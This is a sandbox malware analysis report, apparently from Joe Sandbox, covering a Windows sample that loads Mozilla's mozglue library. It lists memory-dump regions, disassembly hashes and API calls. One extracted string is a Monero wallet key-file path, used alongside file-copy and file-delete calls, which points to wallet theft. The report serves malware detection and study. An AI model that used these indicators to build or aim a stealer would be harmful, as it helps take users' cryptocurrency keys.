                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 791adb879d519f5a1c53862c9019114d697aab0ccf6120195288d91ceaacfd36
                                    • Instruction ID: e054be4e912089ed3fbe17cdbd63fc80a71e98829854b03a051e64cfc09a35bb
                                    • Opcode Fuzzy Hash: 791adb879d519f5a1c53862c9019114d697aab0ccf6120195288d91ceaacfd36
                                    • Instruction Fuzzy Hash: 2D313CB1811118ABDF15EB90DC96BDEB77CAF64300F804199F20967191DF706B48CF95
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DF8,00000000,?), ref: 001982CF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001982D6
                                    • wsprintfA.USER32 ref: 001982F0
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: bdf8257d7a3777b8cbd14eac1a3a1b930e8fc6b424d6c6769ed6a30f3ef32f3e
                                    • Instruction ID: 4630994e7d1ebaa5cdd7c54706073942abf9dbb4f1318df55e77b6eda08eb51c
                                    • Opcode Fuzzy Hash: bdf8257d7a3777b8cbd14eac1a3a1b930e8fc6b424d6c6769ed6a30f3ef32f3e
                                    • Instruction Fuzzy Hash: 982142B1E40204AFDB05DF94DC45FAEBBBCFB49711F104219F605A7680C775A901CBA1
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6BE577
                                    • AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BE584
                                    • ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BE5DE
                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6BE8A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                    • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                    • API String ID: 1483687287-53385798
                                    • Opcode ID: d6dbcc130141c7d376fb0ae0d48b5b96379e70b2bd4610d86a80969e8373bba6
                                    • Instruction ID: 42704a496c8ea43da358345b296f30f332c531bdcbb8709589e90615ed27120d
                                    • Opcode Fuzzy Hash: d6dbcc130141c7d376fb0ae0d48b5b96379e70b2bd4610d86a80969e8373bba6
                                    • Instruction Fuzzy Hash: 4F118E31604258DFCB009F16D488A6DBBF6FFC9368F010619E9A557B51D770A806CBDE
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00198FBE,00000000), ref: 001987FB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00198802
                                    • wsprintfW.USER32 ref: 00198818
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 0699ec1935619053642bd417f23accf2a1bba3c905fa29170fa0533e382828ac
                                    • Instruction ID: 36bb1f8ff526d92f98bf8e6077686ae40a7052a6486829858c665cebc75b5a6a
                                    • Opcode Fuzzy Hash: 0699ec1935619053642bd417f23accf2a1bba3c905fa29170fa0533e382828ac
                                    • Instruction Fuzzy Hash: 2FE0ECB5A44208BFD711DB94DC0AE6977ACEB0A701F000154FE0A97680DA719E109B95
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6C0CD5
                                      • Part of subcall function 6C6AF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6AF9A7
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6C0D40
                                    • free.MOZGLUE ref: 6C6C0DCB
                                      • Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
                                      • Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
                                      • Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2
                                    • free.MOZGLUE ref: 6C6C0DDD
                                    • free.MOZGLUE ref: 6C6C0DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                    • String ID:
                                    • API String ID: 4069420150-0
                                    • Opcode ID: 3e8ef359588e455776f22b8bf18f03a709bc24580ad7f9581dd4078ef239ad1f
                                    • Instruction ID: db3c9609cf6f976d40109ee3fa011ee490782173101638c9b4ea98c14056416a
                                    • Opcode Fuzzy Hash: 3e8ef359588e455776f22b8bf18f03a709bc24580ad7f9581dd4078ef239ad1f
                                    • Instruction Fuzzy Hash: E641F8B1A097849BD720CF29C04079AFBE5FF89714F108A1EE8D887750D770A445CB8B
                                    APIs
                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CCDA4
                                      • Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26
                                      • Part of subcall function 6C6CD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C6CCDBA,00100000,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CD158
                                      • Part of subcall function 6C6CD130: InitializeConditionVariable.KERNEL32(00000098,?,6C6CCDBA,00100000,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CD177
                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CCDC4
                                      • Part of subcall function 6C6C7480: ReleaseSRWLockExclusive.KERNEL32(?,6C6D15FC,?,?,?,?,6C6D15FC,?), ref: 6C6C74EB
                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CCECC
                                      • Part of subcall function 6C68CA10: mozalloc_abort.MOZGLUE(?), ref: 6C68CAA2
                                      • Part of subcall function 6C6BCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C6CCEEA,?,?,?,?,00000000,?,6C6BDA31,00100000,?,?,00000000), ref: 6C6BCB57
                                      • Part of subcall function 6C6BCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C6BCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C6CCEEA,?,?), ref: 6C6BCBAF
                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CD058
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                    • String ID:
                                    • API String ID: 861561044-0
                                    • Opcode ID: db99decde1bcb8c9dfb1f950e2e03afb2f5333ea3e7e33e6f7efcb1957ffb5db
                                    • Instruction ID: a4a1ce886107fc406c61f186249fffc2e02a9a3df3d2090e7bf87fc5b1f586dd
                                    • Opcode Fuzzy Hash: db99decde1bcb8c9dfb1f950e2e03afb2f5333ea3e7e33e6f7efcb1957ffb5db
                                    • Instruction Fuzzy Hash: 31D16E71B04B069FD708CF28C480B99B7E1FF89308F01866DD95987752EB31E9A5CB86
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D2C1
                                    • lstrlen.KERNEL32(00000000), ref: 0018D4D8
                                    • lstrlen.KERNEL32(00000000), ref: 0018D4EC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0018D56B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 07c3d51f5fe79e83e3298d92acf310782a9fb415a92629529ac2f0c998c58191
                                    • Instruction ID: e16540cb6c90c32e8a773cca0553e541d9a64795588dc9072fbd3da10e3f5ba9
                                    • Opcode Fuzzy Hash: 07c3d51f5fe79e83e3298d92acf310782a9fb415a92629529ac2f0c998c58191
                                    • Instruction Fuzzy Hash: 1E919C729101089ACF05FBA4DC96DEE7338AF65304F908569F517660A1EF746B4CCBE2
                                    APIs
                                    • GetTickCount64.KERNEL32 ref: 6C695D40
                                    • EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C695D67
                                    • __aulldiv.LIBCMT ref: 6C695DB4
                                    • LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C695DED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                    • String ID:
                                    • API String ID: 557828605-0
                                    • Opcode ID: ef450bc33486c48436a0b2bcd86668b00c8d6d620e6ee6fc16cdf7471c273174
                                    • Instruction ID: 931ab2c822d611f44716c70d2a6836c0e209e105fa3fd3b4a35b5cbcc532b2fe
                                    • Opcode Fuzzy Hash: ef450bc33486c48436a0b2bcd86668b00c8d6d620e6ee6fc16cdf7471c273174
                                    • Instruction Fuzzy Hash: 25517171E041268FCF08CF69C894AAEBBF2FF85304F19461DD821A7750DB316945CB99
                                    APIs
                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C67CEBD
                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C67CEF5
                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C67CF4E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: memcpy$memset
                                    • String ID: 0
                                    • API String ID: 438689982-4108050209
                                    • Opcode ID: 607c25052b4d1c7c634e32c2e7f96a4b65083280217957f742742b263af47f13
                                    • Instruction ID: 334c46d3cd2635d127a7dc825588b86cab3c83f62a185a41aab3df19961c7edb
                                    • Opcode Fuzzy Hash: 607c25052b4d1c7c634e32c2e7f96a4b65083280217957f742742b263af47f13
                                    • Instruction Fuzzy Hash: D8512371A042168FCB10CF18C490AAABBB5FF99300F19859DD85A5F351D331ED06CBE0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 3b8db521da47d5a22d8b0e2bcab0c1ce7a83fdfcca46f2a26e8b99d07e571b0f
                                    • Instruction ID: 2cedbedf71621322337e37351442f98d23bb2262c79aa8a2276797d37ee573e1
                                    • Opcode Fuzzy Hash: 3b8db521da47d5a22d8b0e2bcab0c1ce7a83fdfcca46f2a26e8b99d07e571b0f
                                    • Instruction Fuzzy Hash: B9416275D101099BCF08EFE4DC95AEEB778BF58304F448028E526772A0EB70AA49CF91
                                    APIs
                                    • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6B82BC,?,?), ref: 6C6B649B
                                      • Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26
                                    • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B64A9
                                      • Part of subcall function 6C6AFA80: GetCurrentThreadId.KERNEL32 ref: 6C6AFA8D
                                      • Part of subcall function 6C6AFA80: AcquireSRWLockExclusive.KERNEL32(6C6FF448), ref: 6C6AFA99
                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B653F
                                    • free.MOZGLUE(?), ref: 6C6B655A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                    • String ID:
                                    • API String ID: 3596744550-0
                                    • Opcode ID: 52a4e0c71e5ae920ff2dc2899b62758622e1cb61baea992e056c2df19afbddfb
                                    • Instruction ID: 7528e6f9b4f2574fd68515787ea5382a2c886459b1ffc55e2dc9249309892321
                                    • Opcode Fuzzy Hash: 52a4e0c71e5ae920ff2dc2899b62758622e1cb61baea992e056c2df19afbddfb
